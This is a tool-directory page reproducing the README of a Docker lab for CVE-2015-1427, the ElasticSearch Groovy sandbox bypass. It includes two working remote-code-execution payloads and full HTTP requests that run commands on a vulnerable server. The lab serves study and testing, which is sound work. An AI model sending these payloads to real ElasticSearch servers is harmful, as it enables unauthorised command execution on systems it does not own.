Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Groovy-scripting-engine-CVE-2015-1427 — Docker-based lab environment for CVE-2015-1427 ElasticSearch Groovy sandbox bypass and remote code execution, demonstrating two POC methods with Java reflection and Groovy command execution. | Kitploit
Tools/GitHubGitHub/cyberharsh/groovy-scripting-engine-cve-2015-1427
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationLearning & Education
GitHubcyberharsh/groovy-scripting-engine-cve-2015-1427

Groovy-scripting-engine-CVE-2015-1427

Docker-based lab environment for CVE-2015-1427 ElasticSearch Groovy sandbox bypass and remote code execution, demonstrating two POC methods with Java reflection and Groovy command execution.

View Repository
106 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

ElasticSearch Groovy Sandbox Bypass && Code Execution Vulnerability (CVE-2015-1427) Test Environment

jre version: openjdk:8-jre

elasticsearch version: v1.4.2

Principle

Reference articles:

  • http://cb.drops.wiki/drops/papers-5107.html
  • http://jordan-wright.com/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/
  • https://github.com/XiphosResearch/exploits
  • http://cb.drops.wiki/drops/papers-5142.html

After CVE-2014-3120, ElasticSearch changed the default dynamic scripting language to Groovy and added a sandbox, but it still supported direct execution of dynamic languages by default. This vulnerability: 1. is a sandbox bypass; 2. is a Groovy code execution vulnerability.

Groovy Language "Sandbox"

ElasticSearch supports using "sandboxed" Groovy language as dynamic scripts, but obviously the official work was not done well. lupin and tang3 respectively proposed two methods to execute commands:

  1. Since there is a sandbox for executing Java code, lupin's method is to find a way to bypass the sandbox, such as using Java reflection.
  2. Groovy is originally a language, so tang3 took a different approach: using methods supported by the Groovy language to directly execute commands, without needing the Java language.

Therefore, based on these two exploitation ideas, we can obtain two different POCs.

Java sandbox bypass method:

java.lang.Math.class.forName("java.lang.Runtime").getRuntime().exec("id").getText()

Groovy direct command execution method:

def command='id';def res=command.execute().text;res

Vulnerability Testing

Build and run the test environment

docker-compose build
docker-compose up -d

Since the query requires at least one piece of data in ES, send the following data packet to add a record:

POST /website/blog/ HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

{
  "name": "test"
}

Then send a data packet containing the payload to execute arbitrary commands:

POST /_search?pretty HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 156

{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}

Download Tool